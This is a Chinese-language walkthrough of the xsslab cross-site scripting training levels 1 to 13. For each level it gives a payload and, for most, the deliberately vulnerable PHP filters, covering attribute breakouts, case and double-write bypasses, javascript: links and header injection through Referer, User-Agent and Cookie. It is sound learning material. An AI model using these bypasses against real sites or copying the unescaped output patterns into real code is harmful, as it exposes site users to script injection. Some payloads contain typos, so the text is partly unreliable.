XSS(七)xsslab
level1
无过滤:name=<script>alert(/xss/)</script>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
level2
闭合:"><script>alert(/xss/)</script>
">onmouseover='alert(/xss/)
第一处在PHP代码块的echo中输出,第二处在表单input中输出,第
一处用htmlspeciachars()做了转义,第二处并没有做限制,闭合
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<input name=keyword value="'.$str.'">
level3
闭合: onmouseover='alert(/xss/)
将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果的,而且源码中的value是用单引号,看来是有意让使用单引号。
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='onmouseover='alert(/xss/)'> (onmouseover:事件)
level4
" onmouseover="alert(/xss/)
这里的俩个输出点,一个被转义,另外一个将尖括号替换为空
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
level5
"><a href="javascript:alert:alert(/xss/)">xss</a>
将<script和on进行了替换
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
level6
大小写绕过:"><sCript>alert(/xss/)</sCript>
level7
将特殊字符替换成空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
" oonnmouseover="alert(/xss/)
"><scscriptript>alert(/xss/)</scscriptript>
level8
将字符转换为小写,然后过滤特殊字符和双引号,加了一个转义函数输出,,代码处的添加友情链接是
突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被过滤对其进行编码绕过再点击友情链接即可。
javascript:alert(/xss/)
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
level9
这次在上一题的基础上加入了strpos()函数,查找如果url中找到'http'那么会返回找
到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会
这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么
可以向输入框加进去就可以绕过了。
javascript:alert(’http:/baidu.com')//http://
level10
&t_sort=xss" onmouseover=alert(/xss/) type="text"
这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数
即'$str33',过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者
是onclick,需要将隐藏表单显示出来触发:
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
level11
Referer: " onmouseover=alert(/xss/) type="text
hidden隐藏了表单,str与str00都被做了转义,可以对输出的$str33写xss语句,
burp抓包改referer即可
level12
同上题原理,改user-agent就可以了
User-Agent:" onclick=alert(/xss/) type="text
level13
同上,改cookie中的user即可
" onfocus=alert(/xss/) type="text
level14